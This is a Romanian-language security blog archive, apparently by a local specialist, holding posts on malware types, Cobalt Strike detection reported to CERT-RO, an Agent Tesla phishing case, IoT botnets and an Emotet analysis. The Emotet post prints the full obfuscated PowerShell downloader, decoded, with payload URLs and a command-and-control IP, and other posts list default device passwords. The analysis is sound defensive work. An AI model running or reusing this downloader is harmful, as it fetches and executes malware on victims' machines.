Arhiva tag-ul pentru: malware

Malware-ul (software rău intenționat) este un termen general pentru programe informatice care sunt concepute să afecteze, să perturbe sau să distrugă sistemele sau datele informatice ale utilizatorilor. Iată o listă cu câteva tipuri comune de malware, descrierea acestora și riscurile asociate:

  1. Virusul – este un program care se poate răspândi de la un sistem la altul prin intermediul fișierelor infectate. Acestea pot provoca daune semnificative fișierelor și sistemelor infectate și pot fi folosite pentru a fura informații sau a încetini funcționarea sistemului.
  2. Worm – este un tip de malware care se răspândește automat prin intermediul rețelelor și a dispozitivelor conectate la acestea. Worm-urile pot fi folosite pentru a fura informații, a instala alte tipuri de malware sau pentru a bloca accesul la rețele.
  3. Trojan – este un program care se instalează pe un sistem aparent inofensiv, dar care are în spate funcționalități ascunse și malicioase. Acestea pot fi folosite pentru a fura informații, pentru a instala alte tipuri de malware sau pentru a compromite sistemul.
  4. Ransomware – este un tip de malware care criptează fișierele utilizatorului și solicită o răscumpărare pentru a le debloca. Ransomware-ul poate fi devastator pentru utilizatorii care își pierd accesul la datele lor și sunt nevoiți să plătească sume mari de bani pentru a le recupera.
  5. Spyware – este un program care se instalează fără știrea utilizatorului și colectează informații despre activitățile lor online. Acestea pot fi folosite pentru a fura informații personale sau financiare și pot duce la pierderi financiare semnificative.
  6. Adware – este un program care afișează reclame nedorite sau pop-up-uri în timp ce utilizatorii navighează pe internet. Acestea pot fi enervante și pot reduce performanța sistemului.
  7. Rootkit – este un tip de malware care se instalează în sistemul de operare și poate ascunde alte programe malware. Acestea pot fi dificil de detectat și de eliminat și pot compromite sistemul pe termen lung.

Toate aceste tipuri de malware prezintă riscuri semnificative pentru utilizatorii de internet, inclusiv pierderea datelor personale, a informațiilor financiare sau a funcționalității sistemului. Este important ca utilizatorii să ia măsuri de protecție, cum ar fi instalarea de software de securitate și actualizarea constantă a sistemelor și a aplicațiilor, pentru a preveni infectarea cu malware.

A source code – an opportunity to find out the secrets of malware applications
• Pegasus – Zero Click Spyware
• Pegasus – Remote Administration Tool
• Analysis of what the source code represents

Pegasus Spyware Zero Click – One of the most dangerous applications of cyber espionage. If most applications require the victim to click on something, it seems that in the case of Zero Click Spyware it is enough for the target device to receive an SMS. The device is compromised and under the control of the attacker.

The publication of the source code is an opportunity for cybersecurity specialists to discover the secrets of international cyber espionage. We’re going to explore the files we found to see if we’re really that lucky.

Așa cum se obișnuiește, în urma unui atac cibernetic, apăr articole despre incident și despre ce se putea face, pentru a nu ajunge în această situație.
Aceiași reacție avem și acum, în urma atacului Ransomware de la Colonial Pipeline. Au apărut soluții și idei, se aruncă vina din stânga în dreapta…

Dar ce se întâmplă cu articolele apărute înainte de incident? Deoarece, în cazul exploatării cu Cobalt Strike au fost suficiente indicii ale serverelor posibil compromise, semnături și metode de descoperire a acestora, la nivel mondial, toate postate de specialiști în securitate cibernetică.

Este foarte simplu!
– Acolo unde există sisteme de prevenție și echipe de securitate cibernetică, se colectează informațiile din mediul online,
– CERT-urile naționale trimit alerte către cei vizați, atunci cănd au informațiile necesare,
– Specialiștii în securitate cibernetică avertizează administratorii de sisteme, prin intermediul articolelor sau în mod direct!

Informația se blochează sau este procesată greu acolo unde nu există: buget, specialiști angajați, conducere responsabilă, implicare.
Mai concret, blocajele apar acolo unde:
– IT-istul este plătit dintr-un buget mic mic, care a fost alocat pe ultima foaie, dar trebuie să facă munca a 2-3 persoane.
– Poziția de specialist IT a fost ocupată de un nepot, sau un cumătru care are competențe in… PDF, iar acesta trimite alertele… în Spam.
– Infrastructura este veche, iar IT-stul este limitat în acțiuni sau trebuie sa aloce foarte mult timp pentru implementare….etc

Revenim la Cobalt Strike. Revenim la Ransomware. Revenim la alerte care pot preveni un incident major.

12 Aprilie. O parte din informatii deja ajung la CERT-RO.

21 Aprilie 2021. Este ”doar o postare”, un mic text și o imagine cu câteva informații. Câteva tag-uri: educatiecibernetica #prodefence #malware #romania #cobaltstrike #audit #pentesting #infrastructura #implicare (ajută la apariția articolului în feed-ul persoanelor interesate de aceste tag-uri) și 2 pagini etichetate CERT-ROProDefence (CERT-RO este etichetată atunci când deja informația a ajuns la ei, iar ProDefence pentru că … noi)

În spatele acestei postări aparent simple, a fost consumat foarte mult timp pentru găsirea unei soluții de descoperire a serverelor care au sau au avut legătură cu Cobalt Strike.
– Căutare informații publicate de alți specialiști,
– Încercare metode noi de căutare, adaptarea unor metode mai vechi la ceea ce căutam,
– Gasire semnături malware din publicații, din platforme analiza malware, analiză malware,
– Testarea și găsirea unei formule adecvate pentru descoperirea serverelor,
– Centralizarea informațiilor găsite.

Am menționat CERT-RO, deoarece la ei ajung informațiile care au legătura cu infrastructura IT din România.
Fără a mai menționa ce ajunge la ei zilnic, am trimis și un pachet cu 322 IP-uri din România, care au cel putin una din cele 4 semnaturi(inițial 3) Cobalt Strike.
Îl voi menționa pe Ovidiu Mogoșan, omul de la CERT-RO, care este asaltat zilnic de rapoartele Prodefence! Nu știu cum reușește să le rezolve pe toate, dar îi mulțumesc pentru profesionalismul și implicarea de care dă dovadă!
Da… multe informații de prelucrat! De aici și dorința domnului Director Dan Cîmpean, de a înființa DNSCDirectoratul Național de Securitate Cibernetică. Mai mulți specialiști, alt buget, tehnologie, licente…. mda.. visul specialiștilor din orice domeniu: BUGET!

Mai departe!

23 Aprilie 2021. 2 avertizări despre servere compromise, care pot fi exploatate de hackeri. ”Doar” căteva sute de IP-uri din România, care au sau avut legătura cu cei 2 agenți de exploatare.
Deci, plus 1042 IP-uri pentru echipa CERT-RO!

Ceea ce vreau să subliniez, este faptul că uneori informațiile există, avem posibilitatea de a preveni incidentele majore sau mai putin majore.

Ceea ce am prezentat mai sus, este doar o mică mică parte din ceea ce se întâmplă, doar că tot acest proces de analiză și centralizare a informațiilor costă timp și bani! Mai ales că toate aceste servere pot ajunge în situația celor de la Pipline!
Specialiști sunt, dar trebuiesc motivați financiar și ”înarmați” cu sisteme care să suporte lupta în războiul cibernetic!

Care este rezolvarea acestei situații?

  • Colaborare / Implicare- Când apare o informație nouă, aceasta trebuie exploatată la maxim! Cauți, întrebi, ceri informații suplimentare de la cei care au creat avertizarea.
  • Actualizarea sistemelor de protecție cu noile informații apărute și blocarea exploatării serverelor administrate.
  • BUGET – Salarii, infrastructură, licențe…

Cu respect,

Alexandru Angheluș

România, fiind în plină dezvoltare tehnologică, se confruntă zilnic cu astfel de situații, unele controlabile, altele greu accesibile prin intermediul administratorilor de hosting, rețea, ISP etc.

Așa cum am menționat și în alte articole, o serie de dispozitive conectate la internet sunt exploatate de hackeri, făcând parte din sistemele lor de răspândire și control al virușilor.

Articolul de astăzi îl vom trece la categoria ”notă explicativă”, pentru ca fiecare să poată vizualiza complexitatea răspândirii unui astfel de virus!

Un simplu document Word ”dezlânțuie” o serie de activități ascunse în interiorul calculatorului, printre care și descărcarea de alte fișiere, în mod neautorizat. Acestea sunt activate și la rândul lor se conectează la o serie de IP-uri/Domenii pentru a stabili o legătură, destul de compleză, cu panoul de comandă al hackerului. Odată stabilită legătura, hackerul poate trimite diverse comenzi calculatorului… de la sustragerea de date, până la comenzi de atac asupra altor sisteme informatice.
Și toate acestea… în decursul a câtorva minute!

Ceea ce este prezentat în imaginea de mai sus, se poate raporta la 2 feluri de victime.

1. O victimă umană, un utilizator ce primește un email infectat.
Dacă are un minim de cunoștințe, totul se v-a termina acolo. Ignoră email-ul.. s-au îl raportează specialistului, în cazul în care pare ceva important… dar suspect!
Dacă descarcă atașamentul și îl deschide… cursul activităților se vede mai sus!

2. Un sistem compromis.
Poate fi: server, router, cameră supraveghere, frigider smart, condolă gaming, TV, pc, telefon, tabletă, sisteme de comunicare interioare, bec smart, încuietoare smart… etc etc
Mai pe scurt, poate fi orice dispozitiv ce este conectat la internet!

Rezolvarea acestor probleme este la fel de complexă și depinde de mulți factori, dar…. un minim de educație în domeniu, un sfat de la un specialist și o minte deschisă…. pot diminua impactul negativ asupra internauților și al sistemelor informatice!

În principiu am vrut să postez doar pozele, dar chiar îmi doresc să înțeleagă toată lumea, de aceea am adaugat și 2-3 fraze!

Așa că… ATENȚIE LA DETALII!!!

– Ultima ameninţare cibernetică se poate instala chiar în încărcătorul mobilului, prin intermediul unui malware.
– Cu ajutorul BadPower, un atacator poate modifica software-ul din încărcătoarele fast charge şi prin urmare şi tensiunea electrică.
– Recomandarea principală este să îţi păzeşti şi încărcătorul, nu doar mobilul, dar programul poate fi instalat şi de la distanţă, prin atacarea telefonului.
– Cel puţin 18 modele sunt vulnerabile la BadPower

Dacă aveai impresia că banalul obiect cu care îţi încarci bateria telefonului este inofensiv, iată că a apărut şi aici o vulnerabilitate de care trebuie să te fereşti. Încărcătoarele noi, de tip „fast charging”, care oferă o încărcare …..
Specialistul în securitate cibernetică, Alexandru Angheluş, îţi recomandă să te fereşti de staţiile publice de încărcare şi să ai grijă atunci când împrumuţi încărcătorul.
Continuarea pe Mediafax.ro

Departamentul contabil al unui client a primit un email din partea “Bancii Transilvania”.

Impactul a fost zero.

Tentativa fiind imediat raportată/redirectionată catre noi, pentru analiză!

Și asta, datorită ședințelor de Securitate cibernetică și Protecția datelor, avute cu toate departamentele, in special cu cele ce dețin date personale sau activează in zona de contabilitate!

Pentru inducerea in eroare, titlul email-ului este destul de atractiv FW: Banca Transilvania

Denumirea documentului este Document_BT24PDF.iso, deci este clară intenția de a masca existența fisierul ISO prin introducerea de “PDF” in denumirea lui.

Documentele ISO, printre altele, conțin arhivarea a unuia sau a mai multor fișiere, în cazul nostru conține un singur fisier .exe

De obicei fișierele executabile sunt acționate in modul silence, dar totuși pentru victimă este adaugat si un alt fișier neutru pentru a îi oferi ceva.
Exemplu: La deschiderea arhivei apare un document PDF, iar în mod invizibil mai rulează un fișier, acel fișier fiind chiar virusul hackerului.

In cazul de față nu există nimic. Doar executabilul care nu oferă nimic victimei, dar iși face treaba in background.

După extragerea executabilului l-am scanat pe VirusTotal pentru a găsi primele informatii

https://www.virustotal.com/gui/file/134ad4f00831941ea066eb4ee2ebbce6873f53d3f0dbf0c608acc921c5697f46/detection

Realizăm că nu este un malware nou creat, deoarece detecția lui este destul de mare.

Lăsăm fisierul executabil să ruleze in calculatorul pentru analiză, încercând să monitorizăm intreaga activitate.

Observăm activitate zero pentru o perioadă de timp, ceea ce inseamnă ca are setat un “Sleep”, adica să întarzie pentru anumite secunde rularea in calculatorul victimei a virusului.

Nu a instalat nimic in calculator, dar a ramas activ executabilul.

In acest timp am pornit si analiza traficului creat intre calculator si orice altceva de pe internet, pentru a vedea dacă activitatea virusului implică si conectarea in exteriorul retelei.

In urma filtrării traficului generat s-a observant că există schimb de date cu un IP extern.
Domain-ul nu este important să îl adăugăm în postare…

Din trafic am extras datele de logare ale virusului la un FTP cu domain de Romania, dar si faptul ca acestea nu mai sunt valabile, raspunsul FTP-ului fiind TCP Out-of-Order

Se pare ca domain-ul de Romania a fost compromis si FTP-ul a fost folosit în setarile virusului.

Am căutat informații despre incident sau malware și am descoperit că a fost facuta o postare pe Twitter despre domain-ul in cauză, împreuna cu afirmatia ca ar fi virusul Agent Tesla.

Același lucru îl găsim si in detaliile de pe VirusTotal.

Am vazut și scanarea pe platforma online a virusului si corelează cu ceea ce am gasit până acum.
Agent Tesla face parte din categoria Password Stealer. Mai exact, extrage toate datele de logare din calculatorul victimei și le trimite către hacker.

Având in vedere că nu există raspuns din partea FTP-ului la logarea virusului, inseamna că nu mai are acces. Fie nu mai există contul de FTP, fie datele de logare au fost schimbate.. etc

Chiar dacă fură ceva din calculatorul viitoarelor victime, nu are unde sa le trimită și astfel victimele doar vor ramane cu un virus inofensiv in calculator, pana va fi descoperit de antivirus, deoarece detecția lui devine foarte mare.

În concluzie, puțină educație si atenția sporită… ne pot scoate din astfel de situații ce pot deveni foarte dăunătoare pentru noi, dar mai ales pentru angajatori, care vor simți pe deplin impactul unei breșe de securitate!

În ceea ce privește domain-ul românesc compromis, acum este ok. De aceea nici virusul nu mai are datele corecte pentru logarea la FTP.
Și așa cum am mai discutat, este un exemplu și pentru deținătorii de pagini web, deoarece pot deveni ”ajutoare! pentru hackeri…
Tehnologia avansează, practicile celor rău intenționați se dezvoltă… este timpul ca toți utilizatorii să acorde atenție și securității cibernetice!


Unii… măcar lucruri elementare, iar cei implicați in activități serioase online… calculați ce pierderi puteți avea DACĂ!!!

Atenție la detalii!!!

Nu mai este o noutate în a avea acasă sau la birou un router, camere Ip, frigidere smart, Smart Tv, încuietori de ușă, console gaming sau orice altceva din gama IoT. Foarte multe Ip-uri au in inventarul lor diferite dispozitive conectate la internet, iar o parte din ele sunt vulnerabile la atacuri hacking sau setările sunt slabe, din punct de vedere al securității cibernetice.
Metodele de hacking au evoluat, nu este nevoie sa caute un dispozitiv anume, sau un oarecare IP pentru ca hackerul sa planteze un virus, nu! In fiecare secundă mii de aplicații scanează tot ce miscă pe internet și caută vulnerabilitați în funcție de: dispozitiv,an fabricatie, vulnerabilitate, tara etc, forțează logarea cu parole de producător (admin/admin , admin/password, root/password, admin/123456 .. etc).
În momentul când aplicațiile au găsit ceva, fie raportează și hackerul merge mai departe, fie instalează direct ceea ce sunt programate să instaleze pe dispozitivele accesate.
Dacă vă gândiți la ce poate să facă cu aceste dispozitive… nu este greu de clarificat!
Activitățile ilegale vor fi stabilite în funcție de: puterea și capacitățile dispozitivului, rețeaua de internet, program online, țara de proveniență etc.


Sursă: researchgate.net

Care ar fi aceste activități?
Scanare pentru a găsi alte dispozitive,
Atac împotriva altor dispozitive, cunoscutul DDOS care poate bloca rețele, instituții, spitale.
Folosirea IP-ului pentru furt bancar, fraude… da! Ghici la cine vine Poliția prima data?
Cam tot ce vă puteți imagina, sau nu!

Și da, noi ne ocupam de Romania!
Liste intregi de IP-uri deținute de Romania sunt folosite la astfel de infracțiuni cibernetice!

Am câteva exemple active, pentru a putea înțelege fenomenul.

86.123.xxx.126 static-86-123-xxx-126.rdsnet.ro
89.121.xxx.159 adsl89-121-xxx-159.romtelecom.net
82.79.150.xxx 84.150.xxx.82.static.cluj.rdsnet.ro
79.118.xxx.239 79-118-xxx-239.pitesti.rdsnet.ro
212.93.xxx.120 212-93-xxx-120.static.rdsor.ro
188.24.xxx.94 188-24-xxx-94.rdsnet.ro
… puțin modificate, pentru a nu da idei!
Revenim, ce sunt aceste IP-uri? Camere conectate la internet, televizoare, console gaming sau orice altceva este conectat la internet!
Dispozitive ce pot aparține unei case, unei firme, camerele unui spital, sau sau sau…

Ce au in comun aceste IP-uri și toate celelalte Ip-uri gasite? Anumite fișiere, ce nu ar trebui să fie pe respectivele dispozitive!
Și mai au în comun niște fișiere: i, Mozi, apk, mips, arm, arm7, mps1, sh, sh4, sparc, exe, zip, doc


Clar că acel 38/59 NU este de bine, iar tag-urile incadrate cu roșu sunt de la ceva suspicios.
Dacă vreți, puneți pe Google și vedeți că am dreptate.

Descrierea celor 2 exemple Mirai și Berbew backdoor se gaseste tot pe Google și destul de explicativă, dar mă repet, Nu este de bine!

Problema este însă cu mult mai gravă. Așa cum am menționat într-un articol acum ceva timp, prin 2019, erau 12,382 Ip-uri folosite pentru activități ilegale și discutăm despre cele descoperite la vremea aceea.

Ce se poate face?
Aici răspunsul nu este chiar simplu!
Din punctul nostru de vedere, un prim pas ar fi ca firmele de internet sa iși mareasca spectrul filtrelor pentru a depista problemele, când cumpărăm un dispozitiv smart, ar trebui să cautăm ceva actualizat, setările dispozitivelor să fie facute corect(schimbare nume dispozitiv, schimbare parolă, control al dispozitivelor ce se conectează.. etc), cand nu stim… să căutam ajutor la cei ce se pricep … sunt multe de facut, dar de multe ori totul se rezumă la resurse; un dispozitiv bun costa, o filtrare mai amănunțită reduce traficul, apelarea la specialiști in securitate cibernetică costă.

Listă cu IP-uri suspecte:
https://www.malwareurl.com/listing.php?as=AS8708&active=on&view=all


Așa că fiecare decide în funcție de valoarea pe care o dă vieții sale private, protejarea familiei, a bunurilor, a firmei, a reputației.
Unii înțeleg în timp util, alții doar după ce au devenit victime sau indiferența lor a dăunat altor persoane dragi.

Nu știu ce vei face, dar eu închei aici acest articol, menționând un ultim lucru:
Toate aceste articole scrise pe anumite subiecte, securitatea cibernetică… in cazul nostru, sunt create pentru a vă ajuta!
Și sperăm să rămâneți cu ceva după tot ceea ce ați citit!

Atenție la detalii!!!

Informațiile introduse în articol sunt publice.
Sursa: Google

Hai să începem cu informațiile de bază!

Emotet este un virus din categoria Trojan sau mai degrabă un downloader, care are nevoie de acceptul victimei pentru a își începe activitatea în noua gazdă.
Este cheia care deschide ușa pentru adevăratul virus, care are ca scop extragerea de date personale, pentru ca hackerul să poată utiliza contul sau cardul victimei în scopuri personale.

Dacă la începuturi era trimis prin email ca executabil, sau atasat(backdoor) anumitor programe „gratuite”, acum trimiterea lui se face prin intermediul unor documente care sunt trimise prin email, îar aceste documente conțin o comandă de descărcare și o adresă web, iar virusul este descărcat de acolo și actionează în noua gazda(pc, mobilr etc).
Aceasta metodă este folosită pentru a păcăli atât protecția serviciilor de email, cât și viitoarea victimă.

La intrarea virusului cu acceptul victimei, șansele de scapare se bazează doar în posibilitatea de recunoaștere a virusului respectiv de catre antivirus, firewall… în funcție de ce are victima în dispozitiv.

Dar sa trecem la povestea noastră și o sa facem o mică analiză malware.
Zilnic apar liste cu Ip-uri, domenii, dispozitive compromise. Una dintre aceste liste conține două domenii de România.
Se presupune că sunt controlate de hackeri și folosite pentru a își gazdui fisierele lor malware.

Accesam adresele si vedem ca ambele contin fisiere .doc.
De precizat ca pana aici Antivirusul nu reactioneaza.

Dupa cum se poate observa, fisierele sunt descarcate de pe aceste domenii de Romania (.ro) si apar ca fiind documente Microsoft Word 97-2003.

La scanare, virusul apare detectat de numai 18 si cei 60 de vendori prezenti pe platforma. Drept urmare, o mare parte si solutiile antivirus NU vor reactiona la aparitia virusului in dispozitiv.
In aceata varianta, doar aplicatiile celor de mai sus pot identifica virusul.
Iata si motivul detectiei slabe, virusul a fost creat… astazi. Ceea ce denota ca hackerul vine cu variante „curate” pentru a evita detectia.
http://trangvang.info.vn/home/pxxx7l/
https://74.101.225.121/tGQWzXxxxhSt
http://trangvang.info.vn/home/pxxx7l/
https://74.101.225.121/tBUxxxQWaf5EyJ8

Acum, pentru a avea o idee despre ce se intampla…
Comanda documentului arata cam asa: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE” /n „C:\Users\admin\AppData\Local\Temp\2050519442433378869714090.doc

Comanda folosita de Powershell este ascunsa si criptata:

Powershell -w hidden -en JABNAGEAdABlAGQAdgB0AG4AZAA9ACcASABpAGoAcgBsAGsAbABjAG4AYgAnADsAJABYAGcAbQB4AGkAagBsAHEAaQBjAGsAbABpACAAPQAgACcAMQAzADkAJwA7ACQATABhAHkAcABvAHQAdwBrAG4APQAnAFMAcwBrAGYAYwBkAHMAaQBrAHcAYwBjACcAOwAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWABnAG0AeABpAGoAbABxAGkAYwBrAGwAaQArACcALgBlAHgAZQAnADsAJABSAGEAegBnAGcAZQBpAHAAcABzAGMAPQAnAFkAawBxAGIAdAB4AHAAegAnADsAJABTAG4AeQBsAGUAdAB6AGsAZgBqAGYAbgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAQgBDAEwAaQBFAG4AVAA7ACQARwBhAHAAawBzAGUAaQB2AGUAbwA9ACcAaAB0AHQAcAA6AC8ALwB0AHIAYQBuAGcAdgBhAG4AZwAuAGkAbgBmAG8ALgB2AG4ALwBoAG8AbQBlAC8AcABvAEkAYwA3AGwALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGYAbAB5AGIAdQB5AHMALgBuAGUAdAAvAGwAaQBiAHIAYQByAGkAZQBzAC8AeABlAHMALwAqAGgAdAB0AHAAOgAvAC8AaQBuAGYAbwByAG0AYQB0AGkAYwAtAGMAbAB1AGIALgBjAG8AbQAvAGwAYQBuAGcAdQBhAGcAZQAvAHkALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAHMAdABpAGMAawB5AHAAbwBzAHQALgBpAG8ALwB3AHAALQBhAGQAbQBpAG4ALwBnAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBkAHIAaQB2AGUAcgB0AHIAYQBpAG4AZQByAHMAYwBoAG8AbwBsAC4AYwBvAG0ALgBhAHUALwBsAG8AZwBzAC8AUgBZAEoAUABnAHIASwBPAEoALwAnAC4AIgBzAGAAcABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAegBqAGkAdQBhAGgAagB5AHIAeQB4AHQAPQAnAEgAZwBrAGMAZABzAGQAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQASwB4AHoAdABhAGwAaABwAGkAbgB2ACAAaQBuACAAJABHAGEAcABrAHMAZQBpAHYAZQBvACkAewB0AHIAeQB7ACQAUwBuAHkAbABlAHQAegBrAGYAagBmAG4ALgAiAGQAYABvAHcATgBMAGAATwBhAEQARgBgAGkAbABFACIAKAAkAEsAeAB6AHQAYQBsAGgAcABpAG4AdgAsACAAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQAWQB0AHYAagBlAHIAcwB5AGEAdABoAHcAPQAnAE8AaABqAGQAZwBmAGIAcgB0AHgAbAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAApAC4AIgBsAGAAZQBuAGcAdABIACIAIAAtAGcAZQAgADMAMgA2ADgAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABhAFIAVAAiACgAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQATwBoAGQAdQBqAHAAdwBoAG0AegB0AGEAZwA9ACcARAB3AGwAawB3AG4AdwBqAHoAeQB1AHMAJwA7AGIAcgBlAGEAawA7ACQAWAB4AG8AbAB2AGsAdABxAD0AJwBIAHEAaAB1AGoAagBnAHoAZAB6ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAZgBpAGkAcwB4AGQAdgA9ACcAUQBnAHAAYwBmAG8AbABvAHkAbgBrAHoAZAAnAA==

Decryptata din Base64

$�M�a�t�e�d�v�t�n�d�=�’�H�i�j�r�l�k�l�c�n�b�’�;�$�X�g�m�x�i�j�l�q�i�c�k�l�i� �=� �’�1�3�9�’�;�$�L�a�y�p�o�t�w�k�n�=�’�S�s�k�f�c�d�s�i�k�w�c�c�’�;�$�Y�q�e�i�s�h�r�f�t�m�p�=�$�e�n�v�:�u�s�e�r�p�r�o�f�i�l�e�+�’�\�’�+�$�X�g�m�x�i�j�l�q�i�c�k�l�i�+�’�.�e�x�e�’�;�$�R�a�z�g�g�e�i�p�p�s�c�=�’�Y�k�q�b�t�x�p�z�’�;�$�S�n�y�l�e�t�z�k�f�j�f�n�=�&�(�’�n�e�’�+�’�w�-�o�’�+�’�b�’�+�’�j�e�c�t�’�)� �n�e�T�.�w�E�B�C�L�i�E�n�T�;�$�G�a�p�k�s�e�i�v�e�o�=�’�h�t�t�p�:�/�/�t�r�a�n�g�v�a�n�g�.�i�n�f�o�.�v�n�/�h�o�m�e�/�p�o�I�c�7�l�/��h�t�t�p�s�:�/�/�w�w�w�.�f�l�y�b�u�y�s�.�n�e�t�/�l�i�b�r�a�r�i�e�s�/�x�e�s�/��h�t�t�p�:�/�/�i�n�f�o�r�m�a�t�i�c�-�c�l�u�b�.�c�o�m�/�l�a�n�g�u�a�g�e�/�y�/��h�t�t�p�:�/�/�d�e�m�o�.�s�t�i�c�k�y�p�o�s�t�.�i�o�/�w�p�-�a�d�m�i�n�/�g�/��h�t�t�p�s�:�/�/�w�w�w�.�d�r�i�v�e�r�t�r�a�i�n�e�r�s�c�h�o�o�l�.�c�o�m�.�a�u�/�l�o�g�s�/�R�Y�J�P�g�r�K�O�J�/�’�.�”�s��p�l�I�T�"�(�[�c�h�a�r�]�4�2�)�;�$�G�z�j�i�u�a�h�j�y�r�y�x�t�=�'�H�g�k�c�d�s�d�f�'�;�f�o�r�e�a�c�h�(�$�K�x�z�t�a�l�h�p�i�n�v� �i�n� �$�G�a�p�k�s�e�i�v�e�o�)�{�t�r�y�{�$�S�n�y�l�e�t�z�k�f�j�f�n�.�"�d��o�w�N�L��O�a�D�F��i�l�E�”�(�$�K�x�z�t�a�l�h�p�i�n�v�,� �$�Y�q�e�i�s�h�r�f�t�m�p�)�;�$�Y�t�v�j�e�r�s�y�a�t�h�w�=�’�O�h�j�d�g�f�b�r�t�x�l�’�;�I�f� �(�(�.�(�’�G�e�t�-�’�+�’�I�t�e�m�’�)� �$�Y�q�e�i�s�h�r�f�t�m�p�)�.�”�l��e�n�g�t�H�"� �-�g�e� �3�2�6�8�1�)� �{�[�D�i�a�g�n�o�s�t�i�c�s�.�P�r�o�c�e�s�s�]�:�:�"�s��T�a�R�T�”�(�$�Y�q�e�i�s�h�r�f�t�m�p�)�;�$�O�h�d�u�j�p�w�h�m�z�t�a�g�=�’�D�w�l�k�w�n�w�j�z�y�u�s�’�;�b�r�e�a�k�;�$�X�x�o�l�v�k�t�q�=�’�H�q�h�u�j�j�g�z�d�z�’�}�}�c�a�t�c�h�{�}�}�$�A�f�i�i�s�x�d�v�=�’�Q�g�p�c�f�o�l�o�y�n�k�z�d�’�

Decryptata are mai multe informatii interesante:

$Matedvtnd=’Hijrlklcnb’;$Xgmxijlqickli = ‘139’;$Laypotwkn=’Sskfcdsikwcc’;$Yqeishrftmp=$env:userprofile+’\’+$Xgmxijlqickli+’.exe’;$Razggeippsc=’Ykqbtxpz’;$Snyletzkfjfn=&(‘ne’+’w-o’+’b’+’ject’) neT.wEBCLiEnT;$Gapkseiveo=’http://trangvang.info.vn/home/poIc7l/https://www.flybuys.net/libraries/xes/http://informatic-club.com/language/y/http://demo.stickypost.io/wp-admin/g/https://www.drivertrainerschool.com.au/logs/RYJPgrKOJ/‘.”splIT"([char]42);$Gzjiuahjyryxt='Hgkcdsdf';foreach($Kxztalhpinv in $Gapkseiveo){try{$Snyletzkfjfn."dowNLOaDFilE”($Kxztalhpinv, $Yqeishrftmp);$Ytvjersyathw=’Ohjdgfbrtxl’;If ((.(‘Get-‘+’Item’) $Yqeishrftmp).”lengtH" -ge 32681) {[Diagnostics.Process]::"sTaRT”($Yqeishrftmp);$Ohdujpwhmztag=’Dwlkwnwjzyus’;break;$Xxolvktq=’Hqhujjgzdz’}}catch{}}$Afiisxdv=’Qgpcfoloynkzd’

Se pot observa domeniile accesate pentru a descarca virusul, dar si comenzile de Download, GET, Item, Start…

Se pare ca intradevar acel document nu este doar ceva de citit, ci contine comenzi de descarcare a unui fisier care stim ce este, dar poate fi orice altceva.
Mai in detaliu: $Xgmxijlqickli = ‘139’ +$Xgmxijlqickli+’.exe … deci avem un 139.exe, nu?

Avem polc7l care este descris ca fiind ATLUtils Module – adica Active Template Library si mai exact este chiar fisierul nostru 139.exe.
14 din 73… destul de rau pentru posibilele victime!

Acest fisier odata executat, instaleza un alt .exe in dispozitivul victimei(da, deja victima).

Acesta se conecteaza la Ip-ul/host-ul de unde vin toate comenzile hackerului.
Virusul in sine preia comenzi date de hacker si le executa la nivel de dispozitiv.
Exemple: se poate raspandi in retea, colecteaza date, trimite date, ataca, stocheaza date, spioneaza tastatura/camera/monitor etc.

In cazul nostru dispozitivul se conecteaza la adresa http://68.114.229.171/, iar acolo se gaseste acel C&C Panel, adica Panoul de Comanda si Control al atacatorului.

Cam asta ar fi pentru astazi.
In concluzie, daca ai o pagina web sau un server si nu sunt protejate, poti deveni parte activa la activitatile ilegale ale hackerilor.
Deocamdata acest lucru nu este pedepsit, dar… in timp lucrurile se pot schimba!

In ceea ce priveste adevarata victima, grija la ce documente accesati, indiferent de la cine credeti ca provin.